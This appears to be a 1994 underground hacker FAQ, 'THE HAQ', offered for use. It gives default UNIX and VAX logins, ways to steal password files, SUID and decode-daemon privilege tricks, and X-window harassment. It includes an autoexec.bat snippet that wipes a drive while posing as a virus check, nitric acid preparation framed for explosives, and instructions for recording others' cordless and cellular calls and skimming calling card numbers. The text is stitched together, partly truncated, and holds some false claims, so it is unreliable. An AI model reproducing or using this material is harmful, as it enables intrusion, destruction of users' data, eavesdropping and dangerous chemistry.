^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS?
 1.  Don't do damage intentionally.
 2.  Don't alter files other than than to hide your presence or to
     remove traces of your intrusion.
 3.  Don't leave any real name, handle, or phone number on any
     system.
 4.  Be careful who you share info with.
 5.  Don't leave your phone number with anyone you don't know.
 6.  Do NOT hack government computers.
 7.  Don't use codes unless you HAVE too.
 8.  Be paranoid!
 9.  Watch what you post on boards, be as general as possible.
10.  Ask questions...but do it politely and don't expect to have
     everything handed to you.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO I DO IF I AM GETTING NOWHERE?
1.  Change parity, data length, and stop bits.  The system may not
    respond to 8N1 (most common setting) but may respond to 7E1,8E2,
    7S2, etc.
2.  Change baud rates.
3.  Send a series of carriage returns.
4.  Send a hard break followed by a carriage return.
5.  Send control characters.  Work from ^a to ^z.
6.  Change terminal emulation.
7.  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO,
    LOGON, JOIN, HELP, or anything else you can think off.

=====================================================================
VII. Screwing with the most widespread operating system on the net
     (UNIX / AIX Hacking)

WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX?
(from Belisarius)
Common default accounts are root, admin, sysadmin, unix, uucp, rje,
guest, demo, daemon, sysbin.  These accounts may be unpassworded
or the password may possibly be the same (i.e. username uucp has
uucp as the passwd).

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:


    userid:password:userid#:groupid#:GECOS field:home dir:shell


What each of these fields mean/do---

userid       -=>  the userid name, entered at login and is what the
                  login searches the file for.  Can be a name or a
                  number.

password     -=>  the password is written here in encrypted form.
                  The encryption is one way only.  When a login
                  occurs the password entered is run through the
                  encryption algorithm (along with a salt) and then
                  contrasted to the version in the passwd file that
                  exists for the login name entered.  If they match,
                  then the login is allowed.  If not, the password is
                  declared invalid.

userid#      -=>  a unique number assigned to each user, used for
                  permissions

groupid#     -=>  similar to userid#, but controls the group the user
                  belongs to.  To see the names of various groups
                  check /etc/group

GECOS FIELD  -=>  this field is where information about the user is
                  stored.  Usually in the format  full name, office
                  number, phone number, home phone.  Also a good
                  source of info to try and crack a password.

home dir     -=>  is the directory where the user goes into
                  the system at (and usually should be brought
                  to when a cd is done)

shell        -=>  this is the name of the shell which is
                  automatically started for the login

Note that all the fields are separated by colons in the passwd file.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file.  You have
to find out what file, where it is and so on.  Ask somebody on your
system about the specifics of the Yellow Pages system, but
discretely!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc.  Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1.  Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell.  If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I HACK INTO AN AIX MACHINE?
(from Prometheus)

If you can get access to the 'console' AIX machines have a security
hole where you can kill the X server and get a shell with
ctrl-alt-bkspce.  Also by starting an xterm up from one you are not
logged in the utmp for that session because the xterms don't do utmp
logging as a default in AIX.  Or try the usual UNIX tricks:
ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
trying each of the usernames with that username as a password.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
(from Prometheus)

A UNIX disk quota may be increased by finding a directory on another
partition and using that.  Find another user who wants more quota and
create a directory for the other to use, one that is world writable.
Once they've put their subdirectory in it, change the perms on the
directory to only read-execute.  The reason this works is that
usually accounts are distributed across a couple of filesystems, and
admins are usually too lazy to give users the same quotas on each
filesystem.  If the users are all on one filesystem, you may be able
to snag some space from one of the /usr/spool directories by creating
a 'hidden' subdirectory like .debug there, and using that.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
(from Wildgoose)
Most x commands have a -display option which allows you to pick a
terminal to send to. So if you use bitmap to create a bitmap, or
download one, etc then:

xsetroot -bitmap bitmapname
[display the bitmap on your screen]

xsetroot -bitmap bitmapname -display xt2500:0
[display the bitmap on another xterm]

Other uses, try xterm -display xt??:0 will give someone else one of
your login windows to play with.  They are then logged in as you
though, and can erase your filespace, etc. Beware!

Slightly irritating:
xclock -geom 1200x1200 -display xt??:0
[fills the entire screen with a clock]

Slightly more irritating:
Use a shell script with xsetroot to flash people's screens different
colors.

On the nastier side:
Use a shell script with xsetroot to kill a person's window manager.

Downright nasty:
Consult the man pages on xkill.  It is possible to kill windows on
any display.  So to log someone off an xterm you merely have to xkill
their login window.

Protect yourself:
If you use xhost -   this will disable other people from being able
to log you out or generally access your terminal.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
(from Caustic)
First, you need to make sure that the decode daemon is active.
Check this by telnetting to the smtp port (usually port 25), and
expanding user Decode.  If it gives you something, you can use it.
If it tells you that the user doesn't exist, or whatever, you can't.

If the daemon is active, this is how to exploit the decode daemon:
1) uuencode an echo to .rhosts
2) pipe that into mail, to be sent to the decode daemon
(What happens: the decode daemon (1st) decodes the process, but
leaves the bin priveleges resident. (2nd) the echo command is
executed, because now the decoded message assumes the bin priveleges
[which are *still* active, even though the daemon didn't issue the
command]).
3) If this is done right, you will be able to rlogin to the sysem.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
(from Belisarius)
If your system has Yellow Pages file managment:

ypcat /etc/passwd > whatever.filename

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW IS A PASSWORD ENCRYPTED IN UNIX?
(from UNIX System Security[p.147])
     Password encryption on UNIX is based on a modified version of
the DES [Data Encryption Standard].  Contrary to popular belief, the
typed password is not encrypted.  Rather the password is used as the
key to encrypt a block of zero-valued bytes.
     To begin the encryption, the first seven bits of each character
in the password are extracted to form the 56-bit key.  This implies
that no more than eight characters are significant in a password.
Next, the E table is modified using the salt, which is the first two
characters of the encrypted password (stored in the passwd file).
The purpose of the salt is to makae it difficult to use hardware DES
chips or a precomputed list of encrypted passwords to attack the
algorithm.  The DES algorithm (with the modified E table) is then
invoked for 25 iterations on the block of zeros.  The output of this
encryption, which is 64 bits long, is then coerced into a
64-character alphabet (A-Z, a-z, 0-9, "." and "/").  Because this
coersion involves translations in which several different values are
represented by the same character, password encryption is essentially
one-way; the result cannot be decrypted.

=====================================================================
VIII. Screwing with the most secure operating system on the net
     (VAX/VMS Hacking)

WHAT IS VAX/VMS?

VAX: Virtual Address eXtension.  Computer is desisgned to use memory
     addresses beyond the actual hardware and can therefore run progs
     larger than physical memory.  Developed by Digital Equipment
     Corporation (DEC).

VMS: Virtual Memory System.  Also developed by DEC.

DCL: Digital Command Language.  Similar to DOS batch language or
     UNIX script language.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE DEFAULT VAX LOGINS?
     Username      Password
     --------      --------
     DECNET        DECNET
     DEFAULT       DEFAULT
     DEMO          DEMO
                   unpassworded
     FIELD         FIELD
                   SERVICE
     GUEST         GUEST
                   unpassworded
     OPERATOR      OPERATOR
     OPERATIONS    OPERATIONS
     SYSMAINT      SYSMAINT
                   SERVICE
                   DIGITAL
     SYSTEM        SYSTEM
                   MANAGER
                   OPERATOR
                   SYSLIB
     SYSTEST       UETP
                   SYSTEST
     SYSTEST_CLIG  CLIG
                   SYSTEST
                   TEST
     SUPPORT       SUPPORT
                   DEC

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE BASIC COMMANDS FROM THE "$" PROMPT?
@: executes a DCL program
     usage- @filename.com
ACCOUNTING: program that tracks usage of the system by users
CREATE: PASCAL compiler
     usage- CREATE filename.pas
CREATE/DIR: create a subdirectory
DEL: delete files
     usage- DEL filename.ext
DIR: list the contents of a directory
     options-  /FULL = full listing with all security info
               /BRIEF = brief listing
               * = wildcard for anything
               % = wildcard for a specific character
EDIT: VMS editor, requires VT-220 terminal
HELP: brings up help info
LOGOUT: obvious
MAIL: send E-mail locally and to any connected networks
$PASSWORD: change your password
     usage- $PASSWORD newpassword
PHONE: chat program
     usage- PHONE changes the prompt to a '%', from there type in
            the username you wish to talk to.  If the user is on a
            different node then enter nodename::username
PHOTO: record session
RUN: execute an executable file
SHOW: lets you look at alot of different stuff
     usage- SHOW option
     options- CLUSTER = VAX cluster, if any
              DEFAULT = directory path and device
              DEVICES = system devices (drives, modems, etc.)
              INTRUSION = accounts being hacked, if any
              MEMORY = obvious
              NETWORK = network name and VAX's location in it
              PROCESS = PROCESS processname shows status
              QUOTA = disk space available for account
              SYSTEM = system info
              DAY = obvious
              TIME = obvious
              USERS = online users
TYPE: display file on terminal (same as DOS 'type' and UNIX 'cat')
SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
     usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
     options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
              WORLD = all users in your world
              GROUP = all users in your group
              SYSTEM = all users with SYSPRV privileges
SET TERMINAL: controls terminal settings
     usage- SET TERMINAL/option
     options- WIDTH=80 = set width to 80 columns
              ADVANCED_VIDEO = selects 124x24 lines
              NOADVANCED_VIDEO = unselects 124x24 lines
              ANSI_CRT = selects ANSI escape sequences
              NOANSI_CRT = unselects ANSI escape sequences
              AUTOBAUD = allows computer to select highest possible
                         baud rate
              NOAUTOBAUD = turn off automatic baud selection
              BROADCAST = allows receipt of SEND, MAIL and PHONE
                          messages
              NOBROADCAST = prevents receiption of SEND, MAIL and
                            PHONE messages
              DEVICE_TYPE=VT220 = set terminal type to VT-220
              ECHO = enables echoing from DCL command line
              NOECHO = disable DCL command line echoing
              FULLDUP = enable full duplex
              NOFULLDUP = disable full duplex
              HANGUP = log off if no carrier
              NOHANGUP = don't log off even if no carrier
              INQUIRE = show device type of terminal
              PAGE=43 = set display length to 43 lines
              TYPE_AHEAD = enable type ahead function
              NOTYPE_AHEAD = disable type ahead function
              UNKNOWN = use for ASCII device types
              WRAP = set wrap around feature
              NOWRAP = unset wrap around feature

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE COMMON VAX FILENAME EXTENSIONS?

          COMPILER SOURCE CODE FILES
          ==========================
ADA = ADA compiler source code file
BAS = BASIC compiler source code file
B32 = BLISS-32 compiler source code file
C   = C compiler source code file
COB = COBOL compiler source code file
FOR = FORTRAN compiler source code file
MAR = MACRO compiler source code file
PAS = PASCAL compiler source code file
PLI = PL/I compiler source code file
OBJ = object code created by compiler before linking

          DCL LANGUAGE FILES
          ==================
CLD = DCL command description file
COM = DCL batch file

          GENERAL FILES
          =============
DAT = DATa file
DIR = subDIRectory file
EXE = EXEcutable program
HLP = text for HeLP libraries
LIS = system listing files (TYPE, PRINT, PHOTO)
LOG = batch job output
MEM = DSR output file
RNO = DSR source file
SIXEL = file for SIXEL graphics
SYS = SYStem image file
TJL = Trouble JournaL
TMP = TeMPorary file
TXT = text library input file
UAF = User Autorization File

          MAIL FILES
          ==========
DIS = DIStribution file
MAI = MAIl message file
TXT = mail output file

          EDT EDITOR FILES
          ================
EDT = command file for the EDT editor
JOU = EDT journal when problems occur
TPU = editor command file

=====================================================================
IX. Screwing with the most widespread operating system on PCs
     (MS-DOS Hacks)

HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities.  I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive.  Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table.  If you
just delete a file, or format a hard drive...with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WRITING A .bat FILE TO 'WIPE' A DRIVE.
Add the following code to the end of autoexec.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt

This prevents any output from Wipe being output.

=====================================================================
X. Finding out what that encrypted info is
     (Cracking programs)

WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs.  They are Crack, Cracker Jack
and Cops.  The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack.  Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386.  To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account.  They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET THESE PROGRAMS?

Crack:         ftp.virginia.edu         /pub/security
CrackerJack:   bnlux1.bnl.gov           /pub/pezz
COPS:

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP.  It works.  It's
dictionary, but it works.  Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.

=====================================================================
XI. How do I keep my info secure
     (PGP / Cryptology)

WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software.  It is a public key encryption program for MS-DOS,
Unix, and Mac.  You create a key pair.  One private (secret) key
and a public key.  The keys are different parts of the whole.  I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring.  Then when they want to send me a message they
encrypt it with PGP and my public key and then send it.  Only I can
decrypt it because you need my secret key to decode it.  (Trust me
you won't get my secret key)  That is PGP.  Please use it if you
want to communicate anything of a ahhhh....sensitive manner.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET PGP?
(from an archie search)

FTP sites for PGP=Pretty Good Privacy Public Encryption System
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

========
Unix PGP
========

Host 130.149.17.7
Location: /pub/local/ini/security
           FILE -rw-rw-r--     651826  Apr  5 1993  pgp22.tar.Z

Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
           FILE -r--r--r--     651826  Mar  7 1993  pgp22.tar.Z

Host coombs.anu.edu.au
Location: /pub/security/cypher
           FILE -r--r--r--     651826  Nov  4 22:28  pgp22.tar.Z



==========
MS-DOS PGP
==========

Host zero.cypher.com
Location: /pub/pgp
           FILE                                       pgp23a.zip

================
MS-DOS PGP SHELL
================

Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
           FILE -rw-r--r--      65160  Aug  9 20:00  pgpshe22.zip

Host nic.switch.ch
Location: /mirror/msdos/security
           FILE -rw-rw-r--      65160  Aug  9 22:00  pgpshe22.zip

Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
           FILE -rw-r--r--      65430  Nov 26 18:28  pgpshe22.zip


=======
Mac PGP
=======

Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
           FILE -r--r--r--     323574  Apr 26 1993  pgp.hqx

Host sics.se
Location: /pub/info-mac/util
           FILE -rw-rw-r--     323574  Nov  5 11:20  pgp.hqx

Host sumex-aim.stanford.edu
Location: /info-mac/util
           FILE -rw-r--r--     323574  Apr 26 1993  pgp.hqx

=====================================================================
XII. Chemistry 101
     (explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
       (Underground electronics)
 XIV. Watching television
       (cable, Pay-Per-View(PPV), scrambling)
  XV. What's on the radio waves?
       (Radios and Scanning)

HOW TO MAKE NITRIC ACID:
(from Neurophire)

Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses.  Purchases can be traced.(From TBBOM13.TXT)

There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!

     Materials:                             Equipment:
     ----------                             ----------
     sodium nitrate or                      adjustable heat source
     potassium nitrate
                                            retort
     distilled water
                                            ice bath
     concentrated
     sulfuric acid                          stirring rod

                                            collecting flask with
                                            stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly.  If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.

3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.

4) Begin heating the retort, using low heat.  Continue heating until
liquid begins to come out of the end of the retort.  The liquid that
forms is nitric acid.  Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed.  This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.

     Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one liter of boiling water.  Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.

=====================================================================
XIII. Fun things with solder, wires, and parts
     (Underground electronics)

HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE?
(from Angel of Death with Belisarius)

The idea is to make a simple timing circuit to create a high freq
tone.  The timing circuit is based upon the 555-chip and uses a
simple speaker to convert the pulses from the 555 into sound.

Required materials: 555 timer chip, 9 V battery, .01 uF capacitor,
                        100k potentiometer, tweeter speaker, wire
                    (the capacitor and resistor values can vary
                     although that changes the possible freqs)


                                  -9V (GND)
   [\                              |
   [s\                             |   ________  ________
   [p \                            |  |        \/        |
   [e  +-------+-------------------+--| 1              8 |-- +9V
   [a  |       |                      |                  |
   [k  |       |  | /.01uF CAP        |         5        |
   [e  +-+     +--|(------+-----------| 2       5      7 |
   [r /  |        | \     |           |         5        |
   [ /   |                |           |                  |
   [/    +--------------- | ----------| 3       t      6 |----+
         |                |           |         i        |    |
         |                |           |         m        |    |
         |                |    +9V  --| 4       e      5 |    |
         |                |           |         r        |    |
         |                |           |__________________|    |
         |                |                                   |
         |        /\      |                                   |
         +----\  /  \-----+-----------------------------------+
               \/ 100k POT

555 Timer Pin Connections
-------------------------
Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead
       of capacitor
Pin 2: Pin 6 and other lead of capacitor
Pin 3: Other lead of the tweeter, one lead of the resistor
Pin 4: Pin 8 and the +9V
Pin 5: No connections
Pin 6: Pin 2 and the other lead of the potentiometer
Pin 7: No connections
Pin 8: Pin 4 and the +9V

=====================================================================
XIV. Watching television
     (cable, Pay-Per-View(PPV), scrambling)

HOW IS CABLE TV SCRAMBLED?
(from Aero)

There are three main types of scrambling for cable TV: trap filters,
gernaral scrambling and addressable scrambling.

1.  Trap filters.  Located in the distribution box and physically
prevent the desired channel from reaching your house.  All you see
when this techniques is used is theoretically static (i.e. a blank
channel).  No filter is perfect, so some signal may reach your TV.
This is an older system of cable protection, and it is easy to bypass
(go out to the box and remove the filter).

2.  General scrambling.  This system scrambles the pay channels (all
the channels before they reach the box), and you need a special
decoder to unscramble them.  The most common method of scambling is
to remove the sync signal. This is also easy to get around as you
can buy descramblers.

3.  Addressable descramblers.  The cable box receives the scrambled
channels, but the cable company sends signals to the box telling it
which ones should be unscrambled.  This is the system used by most
pay-per-view systems.  This is a little harder to defeat, but not too
bad if you have the right equipment/friends.

-=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=-




Jun 13, 1994 19:54 from Belisarius


 _____________
/      /     /             ***     ***      ******       ******
      /                     ***     ***    *********    *********
     /       /               ***     ***  ***     ***  ***     ***
    /       /                 ***********  ***********  ***     ***
   /       /_____    ______    ***********  ***********  ***  ** ***
  /       /     /   /_____/     ***     ***  ***     ***  ***   *****
 /       /     /   /             ***     ***  ***     ***   ***********
/       /     /   /______         ***     ***  ***     ***   *****   ***


                          +---------------+
                          |    THE HAQ    |
                          | Edition  2.07 |
                          |  11 JUN 1994  |
                          +---------------+

                             File 3 of 3

=====================================================================
XV. Tuning in to what's on the radio waves
     (Radios and Scanning)

WHAT DO I NEED TO START SCANNING?
There are to type of main scanner types (determined by the method of
radio reception): either crystal or programmable(synthetic) tuning.
Crystal tuning requires a specific crystal for each desired freq, at



======        ===============
   1               46.610
   2               46.630
   3               46.670
   4               46.710
   5               46.730
   6               46.770
   7               46.830
   8               46.870
   9               46.930
  10               46.970

The range on cordless phones is usually only a block or two.  To
monitor someones calls use a small portable scanner and cassette
recorder and you will have a tape of all their calls.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I SCAN CELLULAR PHONE CONVERSATIONS?
Cellular telephones are a great source of info as they are used by
doctors, lawyers, and other big business.  They are also a great
source of calling card numbers.

Cellular phones operate on a very simple premise.  They receive on
one frequency and transmit on another freq in order to allow
simultaneous communication.  The area is split into two bands
(Band A and Band B) which are split into 21 cells (hence the name
cellular) and each cell has 16 channels within it.

Cellular arrangment:


          ______            ______
         /      \          /      \
        /        \        /        \
       /   Cell   \______/   Cell   \______
       \    #1    /      \    #5    /      \
        \        /        \        /        \
         \______/   Cell   \______/   Cell   \
         /      \    #3    /      \    #7    /
        /        \        /        \        /
       /   Cell   \______/   Cell   \______/
       \    #2    /      \    #6    /      \
        \        /        \        /        \
         \______/   Cell   \______/   Cell   \
         /      \    #4    /      \    #8    /

Band A uses channels 1-333 and Band B uses channels 334-666.  Usually
the first channel in each cell is the Data Channel (333 for Cell 1A,
331 for Cell 2A, etc.).  There are simple formulas to calculate the
frequency for receive and transmit for each channel.

Transmit freq = (channel number * .030 MHz) + 870 MHz

Receive freq  = (channel number * .030 MHz) + 825 MHz

So for Channel 333:    T=879.990 MHz   and   R=834.990 MHz


FOR BAND A
==========
                                      Cell #
Chan     1         2         3         4         5         6         7

 1      333       332       331       330       329       328       327
     879.990   879.960   879.930   879.900   879.870   879.840   879.810
     834.990   834.960   834.930   834.900   834.870   834.840   834.810

 2      312       311       310       309       308       307       306
     879.360   879.330   879.300   879.270   879.240   879.210   879.180
     834.360   834.330   834.300   834.270   834.240   834.210   834.180

 3      291       290       289       288       287       286       285
     878.730   878.700   878.670   878.640   878.610   878.580   878.550
     833.730   833.700   833.670   833.640   833.610   833.580   833.550

 4      270       269       268       267       266       265       264
     878.100   878.070   878.040   878.010   877.980   877.950   877.920
     833.100   833.070   833.040   833.010   832.980   832.950   832.920

 5      249       248       247       246       245       244       243
     877.470   877.440   877.410   877.380   877.350   877.320   877.290
     832.470   832.440   832.410   832.380   832.350   832.320   832.290

 6      228       227       226       225       224       223       222
     876.840   876.810   876.780   876.750   876.720   876.690   876.660
     831.840   831.810   831.780   831.750   831.720   831.690   831.660

 7      207       206       205       204       203       202       201
     876.210   876.180   876.150   876.120   876.090   876.060   876.030
     831.210   831.180   831.150   831.120   831.090   831.060   831.030

 8      186       185       184       183       182       181       180
     875.580   875.550   875.520   875.490   875.460   875.430   875.400
     830.580   830.550   830.520   830.490   830.460   830.430   830.400

 9      165       164       163       162       161       160       159
     874.950   874.920   874.890   874.860   874.830   874.800   874.770
     829.950   829.920   829.890   829.860   829.830   829.800   829.770

10      144       143       142       141       140       139       138
     874.320   874.290   874.260   874.230   874.200   874.170   874.140
     829.320   829.290   829.260   829.230   829.200   829.170   829.140

11      123       122       121       120       119       118       117
     873.690   873.660   873.630   873.600   873.570   873.540   873.510
     828.690   828.660   828.630   828.600   828.570   828.540   828.510

12      102       101       100        99        98        97        96
     873.060   873.030   873.000   872.970   872.940   872.910   872.880
     828.060   828.030   828.000   827.970   827.940   827.910   827.880

13       81        80        79        78        77        76        75
     872.430   872.400   872.370   872.340   872.310   872.280   872.250
     827.430   827.400   827.370   827.340   827.310   827.280   827.250

14       60        59        58        57        56        55        54
     871.800   871.770   871.740   871.710   871.680   871.650   871.620
     826.800   826.770   826.740   826.710   826.680   826.650   826.620

15       39        38        37        36        35        34        33
     871.170   871.140   871.110   871.080   871.050   871.020   870.990
     826.170   826.140   826.110   826.080   826.050   826.020   825.990

16       18        17        16        15        14        13        12
     870.540   870.510   870.480   870.450   870.420   870.390   870.360
     825.540   825.510   825.480   825.450   825.420   825.390   825.360


                                      Cell #
Chan     8         9        10        11        12        13       14

 1      326       325       324       323       322       321      320
     879.780   879.750   879.720   879.690   879.660   879.630   879.600
     834.780   834.750   834.720   834.690   834.660   834.630   834.600

 2      305       304       303       302       301       300       299
     879.150   879.120   879.090   879.060   879.030   879.000   878.970
     834.150   834.120   834.090   834.060   834.030   834.000   833.970

 3      284       283       282       281       280       279       278
     878.520   878.490   878.460   878.430   878.400   878.370   878.340
     833.520   833.490   833.460   833.430   833.400   833.370   833.340

 4      263       262       261       260       259       258       257
     877.890   877.860   877.830   877.800   877.770   877.740   877.710
     832.890   832.860   832.830   832.800   832.770   832.740   832.710

 5      242       241       240       239       238       237       236
     877.260   877.230   877.200   877.170   877.140   877.110   877.080
     832.260   832.230   832.200   832.170   832.140   832.110   832.080

 6      221       220       219       218       217       216       215
     876.630   876.600   876.570   876.540   876.510   876.480   876.450
     831.630   831.600   831.570   831.540   831.510   831.480   831.450

 7      200       199       198       197       196       195       194
     876.000   875.970   875.940   875.910   875.880   875.850   875.820
     831.000   830.970   830.940   830.910   830.880   830.850   830.820

 8      179       178       177       176       175       174       173
     875.370   875.340   875.310   875.280   875.250   875.220   875.190
     830.370   830.340   830.310   830.280   830.250   830.220   830.190

 9      158       157       156       155       154       153       152
     874.740   874.710   874.680   874.650   874.620   874.590   874.560
     829.740   829.710   829.680   829.650   829.620   829.590   829.560

10      137       136       135       134       133       132       131
     874.110   874.080   874.050   874.020   873.990   873.960   873.930
     829.110   829.080   829.050   829.020   828.990   828.960   828.930

11      116       115       114       113       112       111       110
     873.480   873.450   873.420   873.390   873.360   873.330   873.300
     828.480   828.450   828.420   828.390   828.360   828.330   828.300

12       95        94        93        92        91        90        89
     872.850   872.820   872.790   872.760   872.730   872.700   872.670
     827.850   827.820   827.790   827.760   827.730   827.700   827.670

13       74        73        72        71        70        69        68
     872.220   872.190   872.160   872.130   872.100   872.070   872.040
     827.220   827.190   827.160   827.130   827.100   827.070   827.040

14       53        52        51        50        49        48        47
     871.590   871.560   871.530   871.500   871.470   871.440   871.410
     826.590   826.560   826.530   826.500   826.470   826.440   826.410

15       32        31        30        29        28        27        26
     870.960   870.930   870.900   870.870   870.840   870.810   870.780
     825.960   825.930   825.900   825.870   825.840   825.810   825.780

16       11        10         9         8         7         6         5
     870.330   870.300   870.270   870.240   870.210   870.180   870.150
     825.330   825.300   825.270   825.240   825.210   825.180   825.150


                                      Cell #
Chan       15       16       17       18       19        20        21

 1      319       318       317       316       315       314       313
     879.570   879.540   879.510   879.480   879.450   879.420   879.390
     834.570   834.540   834.510   834.480   834.450   834.420   834.390

 2      298       297       296       295       294       293       292
     878.940   878.910   878.880   878.850   878.820   878.790   878.760
